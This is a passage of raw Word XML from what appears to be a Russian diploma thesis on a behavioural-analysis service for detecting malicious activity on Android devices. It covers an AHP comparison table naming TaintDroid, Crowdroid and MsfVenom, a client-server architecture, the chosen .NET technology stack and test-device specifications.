    <w:p w:rsidR="0078129C" w:rsidRPr="0078129C" w:rsidRDefault="00F870DF" w:rsidP="0078129C">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>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78129C" w:rsidRPr="0078129C">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t xml:space="preserve">показатель вектора приоритета по </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="0078129C">
        <w:t xml:space="preserve">-му критерию для </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>i</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidR="0078129C" w:rsidRPr="0078129C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t>ой альтернативы</w:t>
      </w:r>
      <w:r w:rsidR="00547371">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151270" w:rsidRPr="00151270" w:rsidRDefault="00151270" w:rsidP="0078129C">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="subscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>j</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00151270">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">значение важности </w:t>
      </w:r>
      <m:oMath>
        <m:r>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>j</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00151270">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>ого критерия</w:t>
      </w:r>
      <w:r w:rsidR="0078129C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00151270" w:rsidRPr="00547371" w:rsidRDefault="00547371" w:rsidP="00547371">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Вычисление глобального вектора приор</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>итетов представлено в таблице 14</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003843B4" w:rsidRDefault="003843B4" w:rsidP="003843B4">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 1</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>4 – Вычисление глобального вектора приоритетов сравнения альтернатив</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="709"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="707"/>
        <w:gridCol w:w="1575"/>
      </w:tblGrid>
      <w:tr w:rsidR="0078129C" w:rsidTr="00AF064D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Критерий</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6367" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRPr="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>Векторы приоритетов</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Глобальный приоритет</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0078129C" w:rsidTr="003843B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pP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К1</w:t>
            </w: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К2</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К3</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К4</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К5</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К6</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К7</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К8</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К9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0078129C" w:rsidTr="003843B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Важность критерия</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="709" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>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0,02</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0,07</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0,05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="707" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>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0,29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1575" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0078129C" w:rsidRDefault="0078129C" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pP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TaintDroid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9"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0,58</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0,324834</w:t>
            </w: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Crowdroid</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0,33897</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005E7E20" w:rsidTr="003843B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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MsfVenom</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0,08</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0,336196</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008638DD" w:rsidTr="003843B4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1402" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="00CF733B" w:rsidRDefault="008638DD" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="ru-RU"/>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1575" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="008638DD" w:rsidRPr="005E7E20" w:rsidRDefault="008638DD" w:rsidP="008638DD">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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0C4FD7" w:rsidRDefault="000C4FD7" w:rsidP="000D5530">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc61505541"/>
      <w:r>
        <w:t>Выводы второго раздела</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00743D65" w:rsidRDefault="00E3473C" w:rsidP="00B8529C">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Как и было отмечено ранее, данная система использует продвинутый анализ, благодаря кластеризации</w:t>
      </w:r>
      <w:r w:rsidR="00743D65">
        <w:t xml:space="preserve"> системных вызовов приложений для определения легитимности действий. Однако данное средств</w:t>
      </w:r>
      <w:r w:rsidR="000C4FD7">
        <w:t xml:space="preserve">о имеет ряд </w:t>
      </w:r>
      <w:r w:rsidR="000C4FD7">
        <w:lastRenderedPageBreak/>
        <w:t>крупных недостатков</w:t>
      </w:r>
      <w:r w:rsidR="00743D65">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E3473C" w:rsidRDefault="00743D65" w:rsidP="00743D65">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743D65" w:rsidRDefault="00743D65" w:rsidP="00743D65">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>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3014E5" w:rsidRDefault="003014E5" w:rsidP="00093CD4">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3014E5" w:rsidRDefault="003014E5" w:rsidP="00743D65">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355B45" w:rsidRDefault="003014E5" w:rsidP="00743D65">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9D41FE" w:rsidRDefault="009D41FE">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="851"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0027056C" w:rsidRDefault="00F8237A" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="11"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc61505542"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ТЕХНОЛОГИЧЕСКИЙ РАЗДЕЛ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>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FE7F61" w:rsidRPr="00FE7F61" w:rsidRDefault="00630662" w:rsidP="00FE7F61">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6140CC" w:rsidRDefault="006140CC" w:rsidP="00687DF7">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc61505543"/>
      <w:r>
        <w:t>Разработка архитектуры сервиса</w:t>
      </w:r>
      <w:r w:rsidR="004674FA">
        <w:t xml:space="preserve"> поведенческого анализа функционирования мобильных устройств на андроид</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w:rsidR="004D2B52" w:rsidRDefault="006140CC" w:rsidP="008638DD">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>Для реализации сервиса используется клиент-серверная архитектура,</w:t>
      </w:r>
      <w:r w:rsidR="008638DD">
        <w:t xml:space="preserve"> представленная на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00531F4B">
        <w:t>6.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004D2B52" w:rsidRDefault="00135EB8" w:rsidP="004D2B52">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00135EB8">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5806697" cy="3895725"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="27" name="Рисунок 27"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mo\Documents\Work\repos\Diploma\docs\Архитектура.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7841" cy="3896493"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B77C4" w:rsidRDefault="004D2B52" w:rsidP="008638DD">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A22B75">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Архитектура сервиса</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B77C4" w:rsidRDefault="002B77C4" w:rsidP="002B77C4">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B5656D" w:rsidRDefault="002B77C4" w:rsidP="002B77C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Серверное приложение состоит из базы данных, слоя работы с БД и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="002B77C4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5656D" w:rsidRDefault="002B77C4" w:rsidP="002B77C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t>БД необходима для сохранения результатов работы мобильного приложения, а также их обработки</w:t>
      </w:r>
      <w:r w:rsidR="00093CD4">
        <w:t xml:space="preserve">. База данных </w:t>
      </w:r>
      <w:r w:rsidR="00B5656D">
        <w:t>имеет простую схему в виду одной таблицы (рисунок 7), для нормализации хранения информации и упрощенного сохранения и чтения данных из нее, но может быть расширена как дополнительными таблицами, так и виртуальными таблицами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A22B75" w:rsidRDefault="00F870DF" w:rsidP="00A22B75">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:keepNext/>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95pt;height:113.15pt">
            <v:imagedata r:id="rId15" o:title="БД"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5656D" w:rsidRDefault="00A22B75" w:rsidP="00A22B75">
      <w:pPr>
        <w:pStyle w:val="aff4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Схема таблицы БД с данными</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5656D" w:rsidRDefault="002B77C4" w:rsidP="002B77C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Слой работы с БД обеспечивает безопасное управление данными, хранящимися в базе данных, а также позволяет </w:t>
      </w:r>
      <w:r w:rsidR="00C3007B">
        <w:t>гибко настраивать ее и в любой момент времени обрабатыва</w:t>
      </w:r>
      <w:r w:rsidR="00B5656D">
        <w:t>ть актуальные данные.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B77C4" w:rsidRDefault="00C3007B" w:rsidP="002B77C4">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>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C3007B" w:rsidRDefault="00C3007B" w:rsidP="00F054DE">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc61505544"/>
      <w:r>
        <w:t>Обоснование выбора инструментальных средств для разработки ПО</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w:rsidR="00C3007B" w:rsidRDefault="00C3007B" w:rsidP="00C3007B">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>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A22B75" w:rsidRDefault="00C3007B" w:rsidP="00A22B75">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096345" w:rsidRPr="00096345">
        <w:t xml:space="preserve"> [14]</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A22B75" w:rsidP="00A22B75">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r w:rsidRPr="00A22B75">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Entity</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t>объектно-ориентированная технология доступа к данным</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, является </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">решением для </w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NET</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Core</w:t>
      </w:r>
      <w:r w:rsidRPr="00A22B75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>платформы;</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096345" w:rsidRPr="00096345">
        <w:t xml:space="preserve"> [15]</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A22B75" w:rsidRDefault="00847C79" w:rsidP="00A22B75">
      <w:pPr>
        <w:pStyle w:val="14"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>IIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00847C79">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>набор сервисов для служб интернета</w:t>
      </w:r>
      <w:r w:rsidR="00096345" w:rsidRPr="00096345">
        <w:t xml:space="preserve"> [16]</w:t>
      </w:r>
      <w:r>
        <w:t>, на которых функционирует серверное приложение.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00847C79" w:rsidRDefault="00847C79" w:rsidP="00A22B75">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Выбранный стек технологий является одним из наиболее популярных </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>для решения подобных задач, так как данные средства имеют широкое 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Pr="00096345">
        <w:t>[17]</w:t>
      </w:r>
      <w:r w:rsidR="001354A0">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001354A0">
        <w:t>[18],</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кода, разработанный Microsoft [19].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001704CA" w:rsidRDefault="00AF32A4" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="14"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Разработка системы, </w:t>
      </w:r>
      <w:r w:rsidR="001704CA">
        <w:t>и ее тестирование производилось на устройствах, чьи характери</w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>стики представлены в таблице 15</w:t>
      </w:r>
      <w:r w:rsidR="00C07405">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B2148" w:rsidRPr="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
      <w:pPr>
        <w:pStyle w:val="aff0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Таблица </w:t>
      </w:r>
      <w:r w:rsidR="000D5530">
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="008B2148">
        <w:t xml:space="preserve">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340"/>
        <w:gridCol w:w="2321"/>
        <w:gridCol w:w="2318"/>
        <w:gridCol w:w="2365"/>
      </w:tblGrid>
      <w:tr w:rsidR="008B2148" w:rsidTr="00C07405">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Приложение</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Параметр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Разработка</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Тестирование</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B2148" w:rsidTr="00C07405">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Серверное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Клиентское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Мобильное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Pr="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>Смартфон</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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Qualcomm Snapdragon 845</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Pr="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">110 </w:t>
            </w:r>
            <w:r>
              <w:t>Гб</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Pr="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">Гб </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>LPDDR4X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008B2148" w:rsidTr="00C07405">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
            </w:pPr>
            <w:r>
              <w:t>ОС</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>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tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="008B2148" w:rsidRDefault="008B2148" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Android 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C07405" w:rsidTr="00C07405">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2548"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rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2549" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00C07405" w:rsidRDefault="00C07405" w:rsidP="00C07405">
            <w:pPr>
              <w:pStyle w:val="aff2"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
